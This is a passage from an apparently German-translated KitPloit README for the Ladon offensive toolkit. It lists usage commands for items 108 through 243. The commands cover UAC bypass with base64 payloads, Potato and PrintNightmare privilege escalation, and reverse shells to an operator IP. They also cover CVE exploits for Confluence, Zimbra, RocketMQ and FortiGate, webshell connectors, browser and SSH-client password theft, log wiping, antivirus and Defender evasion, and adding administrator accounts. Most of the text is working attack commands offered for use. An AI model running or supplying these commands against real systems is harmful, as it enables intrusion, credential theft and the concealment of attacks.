image

108 whoami – Aktuelle Benutzerberechtigungen und Privilegien anzeigen```Bash

Ladon whoami

root@kitploit:~
##### 109  6 Arten von Whitelist-BypassUAC (nach 8.0) Win7-Win10  Entfernt in Version 10.8, nur 911 beibehalten
Verwendung: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 Umgehung der UAC-Ausführung, unterstützt Win7-Win10 10.8 Version entfernt, nur 911 beibehalten```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) Drucker-Schwachstellen-Privilegien-Eskalations-Exploit```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool Drucker-Schwachstelle Privilegieneskalation EXP```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem Systemrechte erlangen und CMD ausführen```Bash
Ladon GetSystem cmd.exe
114 Kopieren des Tokens und Ausführen von CMD (z.B. SYSTEM-Berechtigung auf aktuellen Explorer-Benutzer herabstufen)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas – Befehle als Benutzer ausführen```Bash
Ladon Runas user pass cmd
116 MS16135 Berechtigungserweiterung auf SYSTEM```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato Dienstbenutzer Privilegieneskalation auf SYSTEM```Bash
Ladon BadPotato cmdline
118 SweetPotato-Dienstbenutzer-Rechteerweiterung zu SYSTEM```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 Privilege Escalation (Dienstbenutzerberechtigung auf System)```Bash
Ladon EfsPotato whoami
120 Open3389 Ein-Klick-Aktivierung von 3389```Bash

Ladon Open3389

root@kitploit:~
##### 121 Aktivieren des integrierten Administrators```Bash
Ladon ActiveAdmin
122 Aktiviere den integrierten Benutzer Guest```Bash

Ladon ActiveGuest

root@kitploit:~
### Reverse Shell

##### 123 Reverse TCP NC Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 Reverse-TCP-MSF-Shell```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 Reverse TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 Reverse HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 Reverse HTTPS MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 Reverse TCP CMD & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 Reverse UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh Port 888 des lokalen Rechners an Port 22 von 112 weiterleiten```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran Portweiterleitung(3389 Beispiel)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

Lokale Ausführung

132 RDP Desktop-Sitzungs-Hijacking (ohne Passwort)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 Registry-Run-Starteintrag hinzufügen```Bash
Ladon RegAuto Test c:\123.exe
134 AT-Ausführungsprogramm (ohne Zeitvorgabe) (Systemberechtigung)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 SC-Dienst Starteintrag hinzufügen & Programm ausführen (SYSTEM-Berechtigung)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

Systeminformationserkennung

136 SNMP-Protokoll zur Erkennung von Betriebssystemen, Geräten usw.```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Nbt-Protokoll zur Erkennung von Windows-Hostnamen, Domäne, Benutzer```Bash
Ladon 192.168.1.8/24 NbtInfo
138 SMB-Protokoll zur Erkennung von Windows-Version, Hostname und Domäne```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  Wmi协议 zur Ermittlung von Windows-Version, Hostname, Domäne```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Mssql-Protokoll zur Erkennung von Windows-Version, Hostname und Domäne```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  Winrm-Protokoll zur Erkennung von Windows-Version, Hostname, Domäne```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange erkennt Windows-Version, Hostname, Domäne```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  Rdp-Protokoll zur Erkennung von Windows-Version, Hostname und Domäne```Bash
Ladon 192.168.1.8/24 RdpInfo

Andere Funktionen

144 Win2008一键启用.net 3.5```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 HTML-Quellcode der internen Website abrufen```Bash
Ladon gethtml http://192.168.1.1
146 Ein-Klick-Mini-WEB-Server für Penetrationstests und Monitoring```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt(无回显漏洞回显结果)
##### 监听```Bash
Ladon web 800
Senden gibt Klartext zurück```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Base64-Verschlüsselungsergebnis```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64-Ergebnis entschlüsseln```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Shiro-Plugin-Erkennung```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat Löscht Tomcat-IP-Protokolle```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 C#-Scan für benutzerdefinierte Assembly-Plugins```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile liest den angegebenen Längeninhalt vom Anfang einer großen Datei```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 Ändern der Registrierung zum Lesen von Klartext-Passwörtern bei Systemen ab 2012```Bash
Ladon SetMzLogonPwd 1
153 Ändern der Registrierungshijacking-Signaturprüfung```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 Batch-Konvertierung von IPs in ip24-Format(192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC Batch-Umwandlung von IPs in ip-C-Format (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  Batch-Konvertierung von IPs in das IP B-Format (192.168.)```Bash
Ladon ip.txt IPB
157 SchwachstellenerkennungAtlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 Exploit```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134Reverse Shell```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo Zertifikatserkennung für Geräte, IPs, Domänen, Rechnernamen, Organisationsinformationen usw.```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo Zertifikate, Geräte, IPs, Domains, Rechnernamen, Organisationen usw. in großen Mengen erkennen```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo Mehrere Methoden zum Abrufen der WordPress-Kern-, Theme- und Plugin-Versionen```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo Massenabruf von WordPress-Kerndateien, Themes und Plugin-Versionen```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Exchange-Brute-Force Erkennung von Exchange-Passwort-Brute-Force```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 Massen-Scan von Zimbra-Mailserver ZIP-Verzeichnis-Traversal RCE-Schwachstelle```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra Mail Server Unauthorized RCE Vulnerability EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd Verbindung zu jsp WebShell (unterstützt cd, k8, ua, uab64)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell Systemversion, Python, GCC und andere Informationen anzeigen, um die Privilegienausweitung zu erleichtern```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd verbindet jsp WebShell (unterstützt cd, k8, ua, uab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 Nicht-interaktive Verbindung der IIS-Raid-Backdoor zur Befehlsausführung```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP prüft, ob der IP-Bereich in den Schwachstellenergebnissen erscheint.```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 Router-Passwort auslesen```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc Batch-Erkennung von Schwachstellen zur beliebigen Codeausführung bei Drucker-PJL```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Hersteller über MAC abfragen (Ladon Mac MAC-Adresse)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Cisco VPN Router Passwort-Cracking (integrierte Standardpasswörter, unterstützt Klartext, Hash)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 Smiley-Backdoor-Schwachstellenerkennung  Entfernt in 10.9```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPress-Passwort-Audit, schwache Passwörter```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Erkennung der Exchange-Version```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Exchange-Hochrisiko-RCE-Schwachstellenerkennung```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Http/S Webseiten-Antwortkopfzeilen abrufen```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S Webseiten-Response-Header + Quellcode abrufen```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S Domänen aus Webseiten extrahieren```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP zur Umgehung von CDN und Ermittlung der echten IP der Domain (mit eindeutigen Schlüsselwortmerkmalen wie Domainname, Titel, Banner usw.)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Firefox-Passwort\Cookie\Verlauf auslesen```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 ohne Echo unterstützt Win7, Win8, Win11, Win2012\2016\2019 usw. Version 10.8 entfernt```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd unterstützt das Auslesen von Passwörtern für Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
186 DraytekScan Passwort-Audit und Erkennung schwacher Draytek-Passwörter```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Xshell Passwortauslesen```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 Unbefugtes Schreiben von SSH-KEY admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  SQL Server Remotebefehle ausführen, SQL-Version, BS-Informationen xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd SQL Server Remote Command Execution efspotato, badpotato Privilege Escalation```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS Version 6.29-6.42 Passwort-Auslesen```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan Standard-Passworterkennung für ZTE-Router und Glasfasermodems (Web)```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 MSNSwitch Router-Passwort auslesen```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd NetGear DGND3700v2 Router-Passwort auslesen```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 T3-Protokoll-Erkennung der WebLogic-Version```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

Ein-Klick-Penetration InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan Mehrere Module zur Erkennung von Systeminformationen```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan mehrere Remote-Schwachstellenerkennung```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan Mehrere Exploits für GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 Unbefugtes Auslesen von Website-Datenbank-Passwörtern```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan Alle Module```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Citrix Gateway-Version erkennen```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Erkennung der Vmware Vcenter Version```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 Defender umgehen, um PowerShell auszuführen```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 SNMP Neustart HP Drucker```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 Bereinigen von Betriebsprotokollen .NET-Protokollierung deaktivieren```Bash
Ladon Clslog
206 ARP-Protokoll zur Erkennung aktiver Hosts```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 Mini-FTP-Server, (unterstützt Windows/Linux integrierte ftp-Befehle für Datei-Upload und -Download)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 Überwache TCP-Paketdaten, speichere als TXT und HEX wie z.B. SMB RDP HTTP SSH LDAP FTP und andere Protokolle```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 Überwachen von UDP-Paketdaten, Speichern als TXT und HEX, wie DNS, SNMP und andere Protokolle```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward Portweiterleitung Portumleitung```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager Unautorisierte RCE-Schwachstellenerkennung (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper unautorisierter Dateilesen-Exploit (Standard: /WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 SMB vollständig deaktivieren, Port 445 deaktivieren, 0-Day, laterale Bewegung, Relay-Angriffe usw. verhindern```Bash
Ladon CloseSMB
214 Deaktivieren des angegebenen Dienstes```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 Angegebenen Dienst stoppen```Bash
Ladon StopService Spooler
216 Freigegebene Ports Offene Ports```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 Port blockieren Port sperren```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken Token-Kopierprogramm```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 RunSystem Privilegieneskalation: Administrator zu SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser Rechteherabstufung Systemrechte auf Benutzerausführung herabgestuft```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato Privilege Escalation Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision 海康威视 Passwort-Audit```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision Hikvision CVE-2017-7921 Schwachstellenerkennung```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision 海康威视 Konfigurationsdatei-Entschlüsselung```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon testspezifische CmdShell```Bash
Ladon web 800 cmd
226 CmdShell für Verbindungstests```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 Domänenadministratoren anzeigen```Bash
Ladon QueryAdminDomain
228 Domäneninformationen anzeigen```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Mndp-Protokoll-Broadcast-Erkennung von Mikrotik-Routern im gleichen Netzwerksegment```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 PostShell-Verbindungstool, unterstützt benutzerdefinierte HTTP-Header-Übermittlung```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  Cmd-Befehl ausführen / unterstützt b64cmd```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 Admin-IP anzeigen, erfolgreiche Anmeldeprotokolle 4624 mit einem Klick lesen```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 Exploit für Remote-Code-Ausführungsschwachstelle```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon Ein-Klick-Killfree-Tool```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Systemrechte unter Win11/2022 erlangen```Bash	
Ladon McpPotato whoami
236 EXE zu HEX, CMD-Befehl zum Schreiben in Datei```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXE in Base64 konvertieren, CMD-Befehl in Datei schreiben```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Zimbra-Mail-System-Versionserkennung```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO Domäneneindringung Gruppenrichtlinien-Lateralbewegungswerkzeug```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 IIS-Websiteinformationen mit einem Klick abrufen```Bash

Ladon IisInfo

root@kitploit:~
##### 241 Spezialisierter WEB-Server für Penetrationstests – LDAP-Deserialisierung```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 Penetrationsspezifischer WEB-Server RMI-Deserialisierung```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 API Administrator hinzufügen (ignoriert System net, net1 Deaktivierung)```Bash	
Ladon AddAdmin admin$ 123456
